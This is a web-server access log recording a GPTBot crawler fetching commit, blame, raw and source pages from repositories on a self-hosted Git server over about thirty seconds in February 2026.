"/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fAssetPilot.spec" [Client 74.7.227.38] [Length 22747] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" -[17/Feb/2026:15:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fGoldMonitor.exe" [Client 74.7.227.38] [Length 20815] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:15:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 10892] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" -[17/Feb/2026:15:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 10861] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" -[17/Feb/2026:15:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" -[17/Feb/2026:15:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 10861] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" -[17/Feb/2026:15:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 7792] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" -[17/Feb/2026:15:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" -[17/Feb/2026:15:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" -[17/Feb/2026:15:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore?display=source" [Client 74.7.227.38] [Length 11132] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" -[17/Feb/2026:15:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 10856] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" -[17/Feb/2026:15:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 10884] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" -[17/Feb/2026:15:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:15:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:15:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:15:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 27289] [Gzip 14.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:15:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:15:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 27323] [Gzip 14.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:15:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 1074] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:15:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 13189] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:15:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 6611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:15:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 74808] [Gzip 23.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:15:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 74840] [Gzip 23.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:15:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 9885] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:15:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:15:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 1074] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:15:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 6611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:15:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 13221] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:15:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 28581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:15:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 28581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:15:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_monitor.spec" [Client 74.7.227.38] [Length 25747] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:15:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fgold_monitor.log" [Client 74.7.227.38] [Length 25025] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" -[17/Feb/2026:15:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_KRX.py" [Client 74.7.227.38] [Length 32045] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:15:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fnos_setup.exe" [Client 74.7.227.38] [Length 23797] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" -[17/Feb/2026:15:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 19724] [Gzip 7.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 34905] [Gzip 9.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12771] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 21550] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" -[17/Feb/2026:15:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10854] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:15:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fREADME.md" [Client 74.7.227.38] [Length 24605] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" -[17/Feb/2026:15:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 11077] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10323] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 46477] [Gzip 15.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10466] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:15:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 23217] [Gzip 11.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 135429] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 